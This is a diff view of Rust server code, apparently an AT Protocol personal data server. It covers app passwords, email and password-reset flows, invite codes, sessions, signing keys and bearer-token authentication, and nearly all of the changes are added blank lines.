#[serde(rename_all = "camelCase")]
17
pub struct AppPassword {
···
19
pub created_at: String,
20
pub privileged: bool,
21
}
22
+
23
#[derive(Serialize)]
24
pub struct ListAppPasswordsOutput {
25
pub passwords: Vec<AppPassword>,
26
}
27
+
28
pub async fn list_app_passwords(
29
State(state): State<AppState>,
30
BearerAuth(auth_user): BearerAuth,
···
57
}
58
}
59
}
60
+
61
#[derive(Deserialize)]
62
pub struct CreateAppPasswordInput {
63
pub name: String,
64
pub privileged: Option<bool>,
65
}
66
+
67
#[derive(Serialize)]
68
#[serde(rename_all = "camelCase")]
69
pub struct CreateAppPasswordOutput {
···
72
pub created_at: String,
73
pub privileged: bool,
74
}
75
+
76
pub async fn create_app_password(
77
State(state): State<AppState>,
78
headers: HeaderMap,
···
152
}
153
}
154
}
155
+
156
#[derive(Deserialize)]
157
pub struct RevokeAppPasswordInput {
158
pub name: String,
159
}
160
+
161
pub async fn revoke_app_password(
162
State(state): State<AppState>,
163
BearerAuth(auth_user): BearerAuth,
+7
src/api/server/email.rs
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
fn generate_confirmation_code() -> String {
14
crate::util::generate_token_code()
15
}
16
#[derive(Deserialize)]
17
#[serde(rename_all = "camelCase")]
18
pub struct RequestEmailUpdateInput {
19
pub email: String,
20
}
21
pub async fn request_email_update(
22
State(state): State<AppState>,
23
headers: axum::http::HeaderMap,
···
119
info!("Email update requested for user {}", user_id);
120
(StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response()
121
}
122
#[derive(Deserialize)]
123
#[serde(rename_all = "camelCase")]
124
pub struct ConfirmEmailInput {
125
pub email: String,
126
pub token: String,
127
}
128
pub async fn confirm_email(
129
State(state): State<AppState>,
130
headers: axum::http::HeaderMap,
···
236
info!("Email updated for user {}", user_id);
237
(StatusCode::OK, Json(json!({}))).into_response()
238
}
239
#[derive(Deserialize)]
240
#[serde(rename_all = "camelCase")]
241
pub struct UpdateEmailInput {
···
244
pub email_auth_factor: Option<bool>,
245
pub token: Option<String>,
246
}
247
pub async fn update_email(
248
State(state): State<AppState>,
249
headers: axum::http::HeaderMap,
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
+
14
fn generate_confirmation_code() -> String {
15
crate::util::generate_token_code()
16
}
17
+
18
#[derive(Deserialize)]
19
#[serde(rename_all = "camelCase")]
20
pub struct RequestEmailUpdateInput {
21
pub email: String,
22
}
23
+
24
pub async fn request_email_update(
25
State(state): State<AppState>,
26
headers: axum::http::HeaderMap,
···
122
info!("Email update requested for user {}", user_id);
123
(StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response()
124
}
125
+
126
#[derive(Deserialize)]
127
#[serde(rename_all = "camelCase")]
128
pub struct ConfirmEmailInput {
129
pub email: String,
130
pub token: String,
131
}
132
+
133
pub async fn confirm_email(
134
State(state): State<AppState>,
135
headers: axum::http::HeaderMap,
···
241
info!("Email updated for user {}", user_id);
242
(StatusCode::OK, Json(json!({}))).into_response()
243
}
244
+
245
#[derive(Deserialize)]
246
#[serde(rename_all = "camelCase")]
247
pub struct UpdateEmailInput {
···
250
pub email_auth_factor: Option<bool>,
251
pub token: Option<String>,
252
}
253
+
254
pub async fn update_email(
255
State(state): State<AppState>,
256
headers: axum::http::HeaderMap,
+12
src/api/server/invite.rs
···
10
use serde::{Deserialize, Serialize};
11
use tracing::error;
12
use uuid::Uuid;
13
#[derive(Deserialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct CreateInviteCodeInput {
16
pub use_count: i32,
17
pub for_account: Option<String>,
18
}
19
#[derive(Serialize)]
20
pub struct CreateInviteCodeOutput {
21
pub code: String,
22
}
23
pub async fn create_invite_code(
24
State(state): State<AppState>,
25
BearerAuth(auth_user): BearerAuth,
···
81
}
82
}
83
}
84
#[derive(Deserialize)]
85
#[serde(rename_all = "camelCase")]
86
pub struct CreateInviteCodesInput {
···
88
pub use_count: i32,
89
pub for_accounts: Option<Vec<String>>,
90
}
91
#[derive(Serialize)]
92
pub struct CreateInviteCodesOutput {
93
pub codes: Vec<AccountCodes>,
94
}
95
#[derive(Serialize)]
96
pub struct AccountCodes {
97
pub account: String,
98
pub codes: Vec<String>,
99
}
100
pub async fn create_invite_codes(
101
State(state): State<AppState>,
102
BearerAuth(auth_user): BearerAuth,
···
172
}
173
Json(CreateInviteCodesOutput { codes: result_codes }).into_response()
174
}
175
#[derive(Deserialize)]
176
#[serde(rename_all = "camelCase")]
177
pub struct GetAccountInviteCodesParams {
178
pub include_used: Option<bool>,
179
pub create_available: Option<bool>,
180
}
181
#[derive(Serialize)]
182
#[serde(rename_all = "camelCase")]
183
pub struct InviteCode {
···
189
pub created_at: String,
190
pub uses: Vec<InviteCodeUse>,
191
}
192
#[derive(Serialize)]
193
#[serde(rename_all = "camelCase")]
194
pub struct InviteCodeUse {
195
pub used_by: String,
196
pub used_at: String,
197
}
198
#[derive(Serialize)]
199
pub struct GetAccountInviteCodesOutput {
200
pub codes: Vec<InviteCode>,
201
}
202
pub async fn get_account_invite_codes(
203
State(state): State<AppState>,
204
BearerAuth(auth_user): BearerAuth,
···
10
use serde::{Deserialize, Serialize};
11
use tracing::error;
12
use uuid::Uuid;
13
+
14
#[derive(Deserialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct CreateInviteCodeInput {
17
pub use_count: i32,
18
pub for_account: Option<String>,
19
}
20
+
21
#[derive(Serialize)]
22
pub struct CreateInviteCodeOutput {
23
pub code: String,
24
}
25
+
26
pub async fn create_invite_code(
27
State(state): State<AppState>,
28
BearerAuth(auth_user): BearerAuth,
···
84
}
85
}
86
}
87
+
88
#[derive(Deserialize)]
89
#[serde(rename_all = "camelCase")]
90
pub struct CreateInviteCodesInput {
···
92
pub use_count: i32,
93
pub for_accounts: Option<Vec<String>>,
94
}
95
+
96
#[derive(Serialize)]
97
pub struct CreateInviteCodesOutput {
98
pub codes: Vec<AccountCodes>,
99
}
100
+
101
#[derive(Serialize)]
102
pub struct AccountCodes {
103
pub account: String,
104
pub codes: Vec<String>,
105
}
106
+
107
pub async fn create_invite_codes(
108
State(state): State<AppState>,
109
BearerAuth(auth_user): BearerAuth,
···
179
}
180
Json(CreateInviteCodesOutput { codes: result_codes }).into_response()
181
}
182
+
183
#[derive(Deserialize)]
184
#[serde(rename_all = "camelCase")]
185
pub struct GetAccountInviteCodesParams {
186
pub include_used: Option<bool>,
187
pub create_available: Option<bool>,
188
}
189
+
190
#[derive(Serialize)]
191
#[serde(rename_all = "camelCase")]
192
pub struct InviteCode {
···
198
pub created_at: String,
199
pub uses: Vec<InviteCodeUse>,
200
}
201
+
202
#[derive(Serialize)]
203
#[serde(rename_all = "camelCase")]
204
pub struct InviteCodeUse {
205
pub used_by: String,
206
pub used_at: String,
207
}
208
+
209
#[derive(Serialize)]
210
pub struct GetAccountInviteCodesOutput {
211
pub codes: Vec<InviteCode>,
212
}
213
+
214
pub async fn get_account_invite_codes(
215
State(state): State<AppState>,
216
BearerAuth(auth_user): BearerAuth,
+1
src/api/server/mod.rs
+5
src/api/server/password.rs
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
fn generate_reset_code() -> String {
14
crate::util::generate_token_code()
15
}
···
28
}
29
"unknown".to_string()
30
}
31
#[derive(Deserialize)]
32
pub struct RequestPasswordResetInput {
33
pub email: String,
34
}
35
pub async fn request_password_reset(
36
State(state): State<AppState>,
37
headers: HeaderMap,
···
102
info!("Password reset requested for user {}", user_id);
103
(StatusCode::OK, Json(json!({}))).into_response()
104
}
105
#[derive(Deserialize)]
106
pub struct ResetPasswordInput {
107
pub token: String,
108
pub password: String,
109
}
110
pub async fn reset_password(
111
State(state): State<AppState>,
112
headers: HeaderMap,
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
+
14
fn generate_reset_code() -> String {
15
crate::util::generate_token_code()
16
}
···
29
}
30
"unknown".to_string()
31
}
32
+
33
#[derive(Deserialize)]
34
pub struct RequestPasswordResetInput {
35
pub email: String,
36
}
37
+
38
pub async fn request_password_reset(
39
State(state): State<AppState>,
40
headers: HeaderMap,
···
105
info!("Password reset requested for user {}", user_id);
106
(StatusCode::OK, Json(json!({}))).into_response()
107
}
108
+
109
#[derive(Deserialize)]
110
pub struct ResetPasswordInput {
111
pub token: String,
112
pub password: String,
113
}
114
+
115
pub async fn reset_password(
116
State(state): State<AppState>,
117
headers: HeaderMap,
+3
src/api/server/service_auth.rs
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::json;
11
use tracing::error;
12
#[derive(Deserialize)]
13
pub struct GetServiceAuthParams {
14
pub aud: String,
15
pub lxm: Option<String>,
16
pub exp: Option<i64>,
17
}
18
#[derive(Serialize)]
19
pub struct GetServiceAuthOutput {
20
pub token: String,
21
}
22
pub async fn get_service_auth(
23
State(state): State<AppState>,
24
headers: axum::http::HeaderMap,
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::json;
11
use tracing::error;
12
+
13
#[derive(Deserialize)]
14
pub struct GetServiceAuthParams {
15
pub aud: String,
16
pub lxm: Option<String>,
17
pub exp: Option<i64>,
18
}
19
+
20
#[derive(Serialize)]
21
pub struct GetServiceAuthOutput {
22
pub token: String,
23
}
24
+
25
pub async fn get_service_auth(
26
State(state): State<AppState>,
27
headers: axum::http::HeaderMap,
+12
src/api/server/session.rs
···
12
use serde::{Deserialize, Serialize};
13
use serde_json::json;
14
use tracing::{error, info, warn};
15
fn extract_client_ip(headers: &HeaderMap) -> String {
16
if let Some(forwarded) = headers.get("x-forwarded-for") {
17
if let Ok(value) = forwarded.to_str() {
···
27
}
28
"unknown".to_string()
29
}
30
#[derive(Deserialize)]
31
pub struct CreateSessionInput {
32
pub identifier: String,
33
pub password: String,
34
}
35
#[derive(Serialize)]
36
#[serde(rename_all = "camelCase")]
37
pub struct CreateSessionOutput {
···
40
pub handle: String,
41
pub did: String,
42
}
43
pub async fn create_session(
44
State(state): State<AppState>,
45
headers: HeaderMap,
···
155
did: row.did,
156
}).into_response()
157
}
158
pub async fn get_session(
159
State(state): State<AppState>,
160
BearerAuth(auth_user): BearerAuth,
···
194
}
195
}
196
}
197
pub async fn delete_session(
198
State(state): State<AppState>,
199
headers: axum::http::HeaderMap,
···
227
}
228
}
229
}
230
pub async fn refresh_session(
231
State(state): State<AppState>,
232
headers: axum::http::HeaderMap,
···
395
}
396
}
397
}
398
#[derive(Deserialize)]
399
#[serde(rename_all = "camelCase")]
400
pub struct ConfirmSignupInput {
401
pub did: String,
402
pub verification_code: String,
403
}
404
#[derive(Serialize)]
405
#[serde(rename_all = "camelCase")]
406
pub struct ConfirmSignupOutput {
···
413
pub preferred_channel: String,
414
pub preferred_channel_verified: bool,
415
}
416
pub async fn confirm_signup(
417
State(state): State<AppState>,
418
Json(input): Json<ConfirmSignupInput>,
···
535
preferred_channel_verified: true,
536
}).into_response()
537
}
538
#[derive(Deserialize)]
539
#[serde(rename_all = "camelCase")]
540
pub struct ResendVerificationInput {
541
pub did: String,
542
}
543
pub async fn resend_verification(
544
State(state): State<AppState>,
545
Json(input): Json<ResendVerificationInput>,
···
12
use serde::{Deserialize, Serialize};
13
use serde_json::json;
14
use tracing::{error, info, warn};
15
+
16
fn extract_client_ip(headers: &HeaderMap) -> String {
17
if let Some(forwarded) = headers.get("x-forwarded-for") {
18
if let Ok(value) = forwarded.to_str() {
···
28
}
29
"unknown".to_string()
30
}
31
+
32
#[derive(Deserialize)]
33
pub struct CreateSessionInput {
34
pub identifier: String,
35
pub password: String,
36
}
37
+
38
#[derive(Serialize)]
39
#[serde(rename_all = "camelCase")]
40
pub struct CreateSessionOutput {
···
43
pub handle: String,
44
pub did: String,
45
}
46
+
47
pub async fn create_session(
48
State(state): State<AppState>,
49
headers: HeaderMap,
···
159
did: row.did,
160
}).into_response()
161
}
162
+
163
pub async fn get_session(
164
State(state): State<AppState>,
165
BearerAuth(auth_user): BearerAuth,
···
199
}
200
}
201
}
202
+
203
pub async fn delete_session(
204
State(state): State<AppState>,
205
headers: axum::http::HeaderMap,
···
233
}
234
}
235
}
236
+
237
pub async fn refresh_session(
238
State(state): State<AppState>,
239
headers: axum::http::HeaderMap,
···
402
}
403
}
404
}
405
+
406
#[derive(Deserialize)]
407
#[serde(rename_all = "camelCase")]
408
pub struct ConfirmSignupInput {
409
pub did: String,
410
pub verification_code: String,
411
}
412
+
413
#[derive(Serialize)]
414
#[serde(rename_all = "camelCase")]
415
pub struct ConfirmSignupOutput {
···
422
pub preferred_channel: String,
423
pub preferred_channel_verified: bool,
424
}
425
+
426
pub async fn confirm_signup(
427
State(state): State<AppState>,
428
Json(input): Json<ConfirmSignupInput>,
···
545
preferred_channel_verified: true,
546
}).into_response()
547
}
548
+
549
#[derive(Deserialize)]
550
#[serde(rename_all = "camelCase")]
551
pub struct ResendVerificationInput {
552
pub did: String,
553
}
554
+
555
pub async fn resend_verification(
556
State(state): State<AppState>,
557
Json(input): Json<ResendVerificationInput>,
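extract_client_ip reads the x-forwarded-for header and falls back to "unknown"; since the middle of the function is folded above, the following is an assumed sketch of the usual convention (the left-most entry in the chain is the original client), not the exact implementation:

// Assumed sketch: take the first entry of a comma-separated x-forwarded-for chain.
fn first_forwarded_ip(header_value: &str) -> Option<String> {
    header_value
        .split(',')
        .next()
        .map(|ip| ip.trim().to_string())
        .filter(|ip| !ip.is_empty())
}

assert_eq!(
    first_forwarded_ip("203.0.113.7, 10.0.0.2").as_deref(),
    Some("203.0.113.7")
);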
+5
src/api/server/signing_key.rs
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::{error, info};
13
const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01];
14
fn public_key_to_did_key(signing_key: &SigningKey) -> String {
15
let verifying_key = signing_key.verifying_key();
16
let compressed_pubkey = verifying_key.to_sec1_bytes();
···
20
let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key);
21
format!("did:key:{}", encoded)
22
}
23
#[derive(Deserialize)]
24
pub struct ReserveSigningKeyInput {
25
pub did: Option<String>,
26
}
27
#[derive(Serialize)]
28
#[serde(rename_all = "camelCase")]
29
pub struct ReserveSigningKeyOutput {
30
pub signing_key: String,
31
}
32
pub async fn reserve_signing_key(
33
State(state): State<AppState>,
34
Json(input): Json<ReserveSigningKeyInput>,
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::{error, info};
13
+
14
const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01];
15
+
16
fn public_key_to_did_key(signing_key: &SigningKey) -> String {
17
let verifying_key = signing_key.verifying_key();
18
let compressed_pubkey = verifying_key.to_sec1_bytes();
···
22
let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key);
23
format!("did:key:{}", encoded)
24
}
25
+
26
#[derive(Deserialize)]
27
pub struct ReserveSigningKeyInput {
28
pub did: Option<String>,
29
}
30
+
31
#[derive(Serialize)]
32
#[serde(rename_all = "camelCase")]
33
pub struct ReserveSigningKeyOutput {
34
pub signing_key: String,
35
}
36
+
37
pub async fn reserve_signing_key(
38
State(state): State<AppState>,
39
Json(input): Json<ReserveSigningKeyInput>,
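public_key_to_did_key compresses the secp256k1 public key, prepends the 0xe7 0x01 multicodec prefix, and multibase-encodes it as base58btc. A usage sketch, assuming SigningKey here is k256's ECDSA signing key (which the secp256k1 prefix suggests); identifiers produced this way typically begin with "did:key:zQ3sh":

use k256::ecdsa::SigningKey;
use rand::rngs::OsRng;

// Generate a throwaway signing key and derive its did:key form.
let signing_key = SigningKey::random(&mut OsRng);
let did_key = public_key_to_did_key(&signing_key);
assert!(did_key.starts_with("did:key:z")); // "z" is the base58btc multibase prefix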
+2
src/api/temp.rs
···
8
use serde_json::json;
9
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
10
use crate::state::AppState;
11
#[derive(Serialize)]
12
#[serde(rename_all = "camelCase")]
13
pub struct CheckSignupQueueOutput {
···
17
#[serde(skip_serializing_if = "Option::is_none")]
18
pub estimated_time_ms: Option<i64>,
19
}
20
pub async fn check_signup_queue(
21
State(state): State<AppState>,
22
headers: HeaderMap,
···
8
use serde_json::json;
9
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
10
use crate::state::AppState;
11
+
12
#[derive(Serialize)]
13
#[serde(rename_all = "camelCase")]
14
pub struct CheckSignupQueueOutput {
···
18
#[serde(skip_serializing_if = "Option::is_none")]
19
pub estimated_time_ms: Option<i64>,
20
}
21
+
22
pub async fn check_signup_queue(
23
State(state): State<AppState>,
24
headers: HeaderMap,
+2
src/api/validation.rs
···
3
pub const MAX_DOMAIN_LENGTH: usize = 253;
4
pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63;
5
const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-";
6
pub fn is_valid_email(email: &str) -> bool {
7
let email = email.trim();
8
if email.is_empty() || email.len() > MAX_EMAIL_LENGTH {
···
49
}
50
true
51
}
52
#[cfg(test)]
53
mod tests {
54
use super::*;
···
3
pub const MAX_DOMAIN_LENGTH: usize = 253;
4
pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63;
5
const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-";
6
+
7
pub fn is_valid_email(email: &str) -> bool {
8
let email = email.trim();
9
if email.is_empty() || email.len() > MAX_EMAIL_LENGTH {
···
50
}
51
true
52
}
53
+
54
#[cfg(test)]
55
mod tests {
56
use super::*;
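is_valid_email trims its input and enforces the length limits declared at the top of the file before the per-character checks (folded above). A usage sketch exercising only those visible rules:

// Plain, well-formed addresses pass; surrounding whitespace is trimmed first.
assert!(is_valid_email("alice@example.com"));
assert!(is_valid_email("  alice@example.com  "));

// Empty or absurdly long inputs are rejected up front.
assert!(!is_valid_email(""));
assert!(!is_valid_email(&format!("a@{}.com", "x".repeat(500))));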
+27
src/auth/extractor.rs
···
5
Json,
6
};
7
use serde_json::json;
8
use crate::state::AppState;
9
use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated};
10
pub struct BearerAuth(pub AuthenticatedUser);
11
#[derive(Debug)]
12
pub enum AuthError {
13
MissingToken,
···
16
AccountDeactivated,
17
AccountTakedown,
18
}
19
impl IntoResponse for AuthError {
20
fn into_response(self) -> Response {
21
let (status, error, message) = match self {
···
45
"Account has been taken down",
46
),
47
};
48
(status, Json(json!({ "error": error, "message": message }))).into_response()
49
}
50
}
51
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
52
let auth_header = auth_header.trim();
53
if auth_header.len() < 8 {
54
return Err(AuthError::InvalidFormat);
55
}
56
let prefix = &auth_header[..7];
57
if !prefix.eq_ignore_ascii_case("bearer ") {
58
return Err(AuthError::InvalidFormat);
59
}
60
let token = auth_header[7..].trim();
61
if token.is_empty() {
62
return Err(AuthError::InvalidFormat);
63
}
64
Ok(token)
65
}
66
pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> {
67
let header = auth_header?;
68
let header = header.trim();
69
if header.len() < 7 {
70
return None;
71
}
72
if !header[..7].eq_ignore_ascii_case("bearer ") {
73
return None;
74
}
75
let token = header[7..].trim();
76
if token.is_empty() {
77
return None;
78
}
79
Some(token.to_string())
80
}
81
impl FromRequestParts<AppState> for BearerAuth {
82
type Rejection = AuthError;
83
async fn from_request_parts(
84
parts: &mut Parts,
85
state: &AppState,
···
90
.ok_or(AuthError::MissingToken)?
91
.to_str()
92
.map_err(|_| AuthError::InvalidFormat)?;
93
let token = extract_bearer_token(auth_header)?;
94
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
95
Ok(user) => Ok(BearerAuth(user)),
96
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
···
99
}
100
}
101
}
102
pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser);
103
impl FromRequestParts<AppState> for BearerAuthAllowDeactivated {
104
type Rejection = AuthError;
105
async fn from_request_parts(
106
parts: &mut Parts,
107
state: &AppState,
···
112
.ok_or(AuthError::MissingToken)?
113
.to_str()
114
.map_err(|_| AuthError::InvalidFormat)?;
115
let token = extract_bearer_token(auth_header)?;
116
match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await {
117
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
118
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
···
120
}
121
}
122
}
123
#[cfg(test)]
124
mod tests {
125
use super::*;
126
#[test]
127
fn test_extract_bearer_token() {
128
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
···
130
assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123");
131
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
132
assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123");
133
assert!(extract_bearer_token("Basic abc123").is_err());
134
assert!(extract_bearer_token("Bearer").is_err());
135
assert!(extract_bearer_token("Bearer ").is_err());
···
5
Json,
6
};
7
use serde_json::json;
8
+
9
use crate::state::AppState;
10
use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated};
11
+
12
pub struct BearerAuth(pub AuthenticatedUser);
13
+
14
#[derive(Debug)]
15
pub enum AuthError {
16
MissingToken,
···
19
AccountDeactivated,
20
AccountTakedown,
21
}
22
+
23
impl IntoResponse for AuthError {
24
fn into_response(self) -> Response {
25
let (status, error, message) = match self {
···
49
"Account has been taken down",
50
),
51
};
52
+
53
(status, Json(json!({ "error": error, "message": message }))).into_response()
54
}
55
}
56
+
57
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
58
let auth_header = auth_header.trim();
59
+
60
if auth_header.len() < 8 {
61
return Err(AuthError::InvalidFormat);
62
}
63
+
64
let prefix = &auth_header[..7];
65
if !prefix.eq_ignore_ascii_case("bearer ") {
66
return Err(AuthError::InvalidFormat);
67
}
68
+
69
let token = auth_header[7..].trim();
70
if token.is_empty() {
71
return Err(AuthError::InvalidFormat);
72
}
73
+
74
Ok(token)
75
}
76
+
77
pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> {
78
let header = auth_header?;
79
let header = header.trim();
80
+
81
if header.len() < 7 {
82
return None;
83
}
84
+
85
if !header[..7].eq_ignore_ascii_case("bearer ") {
86
return None;
87
}
88
+
89
let token = header[7..].trim();
90
if token.is_empty() {
91
return None;
92
}
93
+
94
Some(token.to_string())
95
}
96
+
97
impl FromRequestParts<AppState> for BearerAuth {
98
type Rejection = AuthError;
99
+
100
async fn from_request_parts(
101
parts: &mut Parts,
102
state: &AppState,
···
107
.ok_or(AuthError::MissingToken)?
108
.to_str()
109
.map_err(|_| AuthError::InvalidFormat)?;
110
+
111
let token = extract_bearer_token(auth_header)?;
112
+
113
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
114
Ok(user) => Ok(BearerAuth(user)),
115
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
···
118
}
119
}
120
}
121
+
122
pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser);
123
+
124
impl FromRequestParts<AppState> for BearerAuthAllowDeactivated {
125
type Rejection = AuthError;
126
+
127
async fn from_request_parts(
128
parts: &mut Parts,
129
state: &AppState,
···
134
.ok_or(AuthError::MissingToken)?
135
.to_str()
136
.map_err(|_| AuthError::InvalidFormat)?;
137
+
138
let token = extract_bearer_token(auth_header)?;
139
+
140
match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await {
141
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
142
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
···
144
}
145
}
146
}
147
+
148
#[cfg(test)]
149
mod tests {
150
use super::*;
151
+
152
#[test]
153
fn test_extract_bearer_token() {
154
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
···
156
assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123");
157
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
158
assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123");
159
+
160
assert!(extract_bearer_token("Basic abc123").is_err());
161
assert!(extract_bearer_token("Bearer").is_err());
162
assert!(extract_bearer_token("Bearer ").is_err());
+35
-1
src/auth/mod.rs
···
3
use std::fmt;
4
use std::sync::Arc;
5
use std::time::Duration;
6
use crate::cache::Cache;
7
pub mod extractor;
8
pub mod token;
9
pub mod verify;
10
pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header};
11
pub use token::{
12
create_access_token, create_refresh_token, create_service_token,
···
16
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
17
};
18
pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token};
19
const KEY_CACHE_TTL_SECS: u64 = 300;
20
const SESSION_CACHE_TTL_SECS: u64 = 60;
21
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
22
pub enum TokenValidationError {
23
AccountDeactivated,
···
25
KeyDecryptionFailed,
26
AuthenticationFailed,
27
}
28
impl fmt::Display for TokenValidationError {
29
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
30
match self {
···
35
}
36
}
37
}
38
pub struct AuthenticatedUser {
39
pub did: String,
40
pub key_bytes: Option<Vec<u8>>,
41
pub is_oauth: bool,
42
}
43
pub async fn validate_bearer_token(
44
db: &PgPool,
45
token: &str,
46
) -> Result<AuthenticatedUser, TokenValidationError> {
47
validate_bearer_token_with_options_internal(db, None, token, false).await
48
}
49
pub async fn validate_bearer_token_allow_deactivated(
50
db: &PgPool,
51
token: &str,
52
) -> Result<AuthenticatedUser, TokenValidationError> {
53
validate_bearer_token_with_options_internal(db, None, token, true).await
54
}
55
pub async fn validate_bearer_token_cached(
56
db: &PgPool,
57
cache: &Arc<dyn Cache>,
···
59
) -> Result<AuthenticatedUser, TokenValidationError> {
60
validate_bearer_token_with_options_internal(db, Some(cache), token, false).await
61
}
62
pub async fn validate_bearer_token_cached_allow_deactivated(
63
db: &PgPool,
64
cache: &Arc<dyn Cache>,
···
66
) -> Result<AuthenticatedUser, TokenValidationError> {
67
validate_bearer_token_with_options_internal(db, Some(cache), token, true).await
68
}
69
async fn validate_bearer_token_with_options_internal(
70
db: &PgPool,
71
cache: Option<&Arc<dyn Cache>>,
···
73
allow_deactivated: bool,
74
) -> Result<AuthenticatedUser, TokenValidationError> {
75
let did_from_token = get_did_from_token(token).ok();
76
if let Some(ref did) = did_from_token {
77
let key_cache_key = format!("auth:key:{}", did);
78
let mut cached_key: Option<Vec<u8>> = None;
79
if let Some(c) = cache {
80
cached_key = c.get_bytes(&key_cache_key).await;
81
if cached_key.is_some() {
···
84
crate::metrics::record_auth_cache_miss("key");
85
}
86
}
87
let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key {
88
let user_status = sqlx::query!(
89
"SELECT deactivated_at, takedown_ref FROM users WHERE did = $1",
···
93
.await
94
.ok()
95
.flatten();
96
match user_status {
97
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref),
98
None => (None, None, None),
···
112
{
113
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
114
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
115
if let Some(c) = cache {
116
let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await;
117
}
118
(Some(key), user.deactivated_at, user.takedown_ref)
119
} else {
120
(None, None, None)
121
}
122
};
123
if let Some(decrypted_key) = decrypted_key {
124
if !allow_deactivated && deactivated_at.is_some() {
125
return Err(TokenValidationError::AccountDeactivated);
126
}
127
if takedown_ref.is_some() {
128
return Err(TokenValidationError::AccountTakedown);
129
}
130
if let Ok(token_data) = verify_access_token(token, &decrypted_key) {
131
let jti = &token_data.claims.jti;
132
let session_cache_key = format!("auth:session:{}:{}", did, jti);
133
let mut session_valid = false;
134
if let Some(c) = cache {
135
if let Some(cached_value) = c.get(&session_cache_key).await {
136
session_valid = cached_value == "1";
···
139
crate::metrics::record_auth_cache_miss("session");
140
}
141
}
142
if !session_valid {
143
let session_exists = sqlx::query_scalar!(
144
"SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()",
···
149
.await
150
.ok()
151
.flatten();
152
session_valid = session_exists.is_some();
153
if session_valid {
154
if let Some(c) = cache {
155
let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await;
156
}
157
}
158
}
159
if session_valid {
160
return Ok(AuthenticatedUser {
161
did: did.clone(),
···
166
}
167
}
168
}
169
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) {
170
if let Some(oauth_token) = sqlx::query!(
171
r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref
···
182
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
183
return Err(TokenValidationError::AccountDeactivated);
184
}
185
if oauth_token.takedown_ref.is_some() {
186
return Err(TokenValidationError::AccountTakedown);
187
}
188
let now = chrono::Utc::now();
189
if oauth_token.expires_at > now {
190
return Ok(AuthenticatedUser {
···
195
}
196
}
197
}
198
Err(TokenValidationError::AuthenticationFailed)
199
}
200
pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) {
201
let key_cache_key = format!("auth:key:{}", did);
202
let _ = cache.delete(&key_cache_key).await;
203
}
204
#[derive(Debug, Serialize, Deserialize)]
205
pub struct Claims {
206
